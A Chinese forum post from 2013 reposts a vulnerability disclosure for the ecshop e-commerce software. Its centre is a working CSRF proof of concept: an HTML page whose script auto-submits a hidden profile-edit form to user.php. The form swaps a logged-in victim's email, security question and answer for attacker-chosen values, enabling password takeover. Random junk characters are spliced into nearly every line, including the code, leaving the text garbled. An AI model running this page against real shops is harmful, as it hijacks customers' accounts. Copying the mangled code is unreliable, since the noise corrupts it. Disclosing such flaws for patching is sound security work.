找回密码
 立即注册
查看: 2458|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:+ n# O4 v5 A2 {
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
" F! u& K: n% d% s6 v" [% \: S% o- [" G6 F
Demo For:http://www.wooyun.org/bug.php?action=view&id=395: i. G6 z! C; m; e

1 ~. J! j5 P! |详细说明:5 b4 b4 X/ C) t. K8 S
利用csrf和xss可以突破官方所说的“障碍”+ b9 m. B& z- q5 ~' L
xss版本已经有人说明7 R1 P7 L% I& o( I
这里给出csrf版本
9 `8 t& |* O( c3 d/ M" G% g& d+ C0 ]5 L, N& u
漏洞证明:
5 V$ S/ e3 }! G( P) Y1 G<html>
3 h# y: M1 x' P! x7 o0 v<body>% Z4 C' p* ^9 H0 z; B& ?$ I5 z/ B
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
9 F  U0 @% V' J* d<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
( _' i  ~* B0 F' S8 o<INPUT TYPE="text" NAME="act" value="act_edit_profile">. A. w( k. V1 B, `4 ?
<INPUT TYPE="text" NAME="sel_question" value="ecshop">. S3 i( c* o$ h: l" ]; S
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">" u( l( N1 s; ~2 g) v+ z) p- C. s- e
</body>0 `/ ?& Z- ?7 K2 p  ^$ O
<script>
  f- Z. H; C4 q& {document.forms[0].submit();
0 z& B7 n; R$ u2 U5 y7 K  e</script>
( ~) @/ V5 `9 S& g* m</html>
( J" L/ l4 e: p$ }构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失
$ L  ?, b4 G  B7 A; q. n$ k$ G3 \" \% G9 i& b, o; a$ S" q
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表